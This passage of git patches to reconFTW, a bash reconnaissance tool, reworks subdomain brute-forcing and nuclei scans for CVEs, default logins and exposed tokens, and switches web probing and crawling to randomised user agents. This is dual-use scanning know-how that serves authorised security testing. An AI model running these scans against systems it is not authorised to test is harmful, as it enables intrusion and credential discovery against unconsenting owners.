.tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt + + NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + + if [ "$NUMOFLINES" -gt 0 ]; then + notification "${NUMOFLINES} new subdomains found with recursive search" info + fi + end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} + else + notification "Skipping Recursive: Too Much Subdomains" warn + fi + else + if [ "$SUBRECURSIVE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + function subtakeover(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ] then start_func "Looking for possible subdomain takeover" touch .tmp/tko.txt - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -o .tmp/tko.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) if [ "$NUMOFLINES" -gt 0 ]; then notification "${NUMOFLINES} new possible takeovers found" info @@ -565,44 +603,6 @@ function s3buckets(){ fi } -function sub_recursive(){ - if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ] - then - if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] - then - start_subfunc "Running : Subdomains recursive search" - echo "" > .tmp/brute_recursive_wordlist.txt - for sub in $(cat subdomains/subdomains.txt); do - sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt - done - eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD - cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt - - eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt - eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt - - NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - - if [ "$NUMOFLINES" -gt 0 ]; then - notification "${NUMOFLINES} new subdomains found with recursive search" info - fi - end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} - else - notification "Skipping Recursive: Too Much Subdomains" warn - fi - else - if [ "$SUBRECURSIVE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" - else - printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" - fi - fi -} - ############################################################################################################### ########################################### WEB DETECTION ##################################################### ############################################################################################################### @@ -779,23 +779,23 @@ function nuclei_check(){ eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -987,7 +987,7 @@ function jschecks(){ cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD + cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 054e642c3e6b16f93e3e025df83004fad14170e0 Mon Sep 17 00:00:00 2001 From: six2dez Date: Sat, 17 Apr 2021 03:12:45 +0200 Subject: [PATCH 05/19] Random agent --- install.sh | 2 ++ reconftw.cfg | 2 +- reconftw.sh | 30 +++++++++++++++--------------- 3 files changed, 18 insertions(+), 16 deletions(-) diff --git a/install.sh b/install.sh index de51ed50..e2af73ba 100755 --- a/install.sh +++ b/install.sh @@ -163,6 +163,7 @@ mkdir -p ~/.gf mkdir -p $tools mkdir -p ~/.config/notify/ mkdir -p ~/.config/amass/ +mkdir -p ~/.config/nuclei/ touch $dir/.github_tokens eval pip3 install -U -r requirements.txt $DEBUG_STD @@ -187,6 +188,7 @@ printf "${bblue}\n Running: Installing repositories (${#repos[@]})${reset}\n\n" eval git clone https://github.com/projectdiscovery/nuclei-templates ~/nuclei-templates $DEBUG_STD eval nuclei -update-templates $DEBUG_STD sed -i 's/^miscellaneous/#miscellaneous/' ~/nuclei-templates/.nuclei-ignore +sed -i 's/^#random-agent: false/random-agent: true/' ~/.config/nuclei/config.yaml eval git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git $dir/sqlmap $DEBUG_STD eval git clone --depth 1 https://github.com/drwetter/testssl.sh.git $dir/testssl.sh $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index c001d1d3..8fdbfada 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -18,7 +18,7 @@ NPROC=$(nproc || echo -n 1) SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git branch --show-current)-$(git describe --tags) -update_resolvers=false +update_resolvers=true #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) diff --git a/reconftw.sh b/reconftw.sh index fd5710c2..f240e169 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -280,7 +280,7 @@ function subdomains_full(){ if [ "$update_resolvers" = true ] then if [[ $(find "$resolvers" -mtime +1 -print) ]]; then - notification "Updating resolvers lists..." warning + notification "Updating resolvers lists..." warn eval dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o $resolvers $DEBUG_STD fi fi @@ -423,19 +423,19 @@ function sub_scraping(){ then start_subfunc "Running : Source code scraping subdomain search" touch .tmp/scrap_subs.txt - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -csp-probe -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -tls-probe -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt + cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt + cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt + cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt if [ "$DEEP" = true ] ; then - gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else - gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) - cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt + cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} else if [ "$SUBSCRAPING" = false ]; then @@ -616,7 +616,7 @@ function webprobe_simple(){ then mv .tmp/probed_tmp_scrap.txt .tmp/probed_tmp.txt else - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt fi deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt @@ -635,7 +635,7 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR @@ -899,9 +899,9 @@ function urlchecks(){ if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; then if [ "$DEEP" = true ] ; then - gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else - gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt fi fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt @@ -978,7 +978,7 @@ function jschecks(){ cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" - cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + cat js/jsfile_links.txt | httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null if [ -s ".tmp/js_endpoints.txt" ] @@ -1037,13 +1037,13 @@ function brokenLinks(){ start_func "Broken links checks" if [ ! -s ".tmp/gospider.txt" ]; then if [ "$DEEP" = true ] ; then - gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else - gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt fi fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt - cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) notification "${NUMOFLINES} new broken links found" info end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} From e5c000485194044f983fd884b1126a3c9e7a427a Mon Sep 17 00:00:00 2001 From: six2dez Date: Sun, 18 Apr 2021 01:50:44 +0200 Subject: [PATCH 06/19] Gauplus random-agent --- reconftw.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/reconftw.sh b/reconftw.sh index f240e169..09c7b9c6 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -334,7 +334,7 @@ function sub_passive(){ fi eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt - timeout 10m gauplus -t $GAUPLUS_THREADS -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt + timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt if echo $domain | grep -q ".mil$"; then mildew mv mildew.out .tmp/mildew.out From bdaa882725698607bc61bb8cf1410b0f3e62f653 Mon Sep 17 00:00:00 2001 From: six2dez Date: Sun, 18 Apr 2021 02:18:58 +0200 Subject: [PATCH 07/19] Menu options fix --- reconftw.sh | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 09c7b9c6..03002369 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -1659,7 +1659,7 @@ function help(){ printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n" printf " ${bblue}TARGET OPTIONS${reset}\n" printf " -d domain.tld Target domain\n" - printf " -m company Target company name\n" +# printf " -m company Target company name\n" printf " -l list.txt Targets list, one per line\n" printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n" printf " -i in.txt Include subdomains list\n" @@ -1675,7 +1675,6 @@ function help(){ printf " \n" printf " ${bblue}GENERAL OPTIONS${reset}\n" printf " --deep Deep scan (Enable some slow options for deeper scan)\n" - printf " --fs Full scope (Enable widest scope *domain* options)\n" printf " -o output/path Define output folder\n" printf " \n" printf " ${bblue}USAGE EXAMPLES${reset}\n" @@ -1688,9 +1687,9 @@ function help(){ printf " Web scanning for subdomain list:\n" printf " ./reconftw.sh -d example.com -l targets.txt -w\n" printf " \n" - printf " Multidomain recon:\n" - printf " ./reconftw.sh -m company -l domainlist.txt -r\n" - printf " \n" +# printf " Multidomain recon:\n" +# printf " ./reconftw.sh -m company -l domainlist.txt -r\n" +# printf " \n" printf " Full recon with custom output and excluded subdomains list:\n" printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n" } @@ -1723,8 +1722,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do ## TARGETS - m ) multi=$OPTARG - ;; +# m ) multi=$OPTARG +# ;; d ) domain=$OPTARG ;; l ) list=$OPTARG From dfeb960bfccecb1d11a43fb1bc0d5b7a08c76632 Mon Sep 17 00:00:00 2001 From: six2dez Date: Sun, 18 Apr 2021 03:13:30 +0200 Subject: [PATCH 08/19] Gospider fix --- reconftw.sh | 84 ++++++++++++++++++++++++++--------------------------- 1 file changed, 42 insertions(+), 42 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 03002369..7703ae31 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -127,7 +127,7 @@ function google_dorks(){ end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]} else if [ "$GOOGLE_DORKS" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -152,7 +152,7 @@ function github_dorks(){ end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else if [ "$GITHUB_DORKS" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -169,7 +169,7 @@ function metadata(){ end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -208,7 +208,7 @@ function emails(){ end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -251,7 +251,7 @@ function domain_info(){ end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -358,7 +358,7 @@ function sub_crt(){ end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} else if [ "$SUBCRT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -411,7 +411,7 @@ function sub_brute(){ end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} else if [ "$SUBBRUTE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -424,8 +424,8 @@ function sub_scraping(){ start_subfunc "Running : Source code scraping subdomain search" touch .tmp/scrap_subs.txt cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt + cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt if [ "$DEEP" = true ] ; then gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else @@ -439,7 +439,7 @@ function sub_scraping(){ end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} else if [ "$SUBSCRAPING" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -503,7 +503,7 @@ function sub_permut(){ end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} else if [ "$SUBPERMUTE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -541,7 +541,7 @@ function 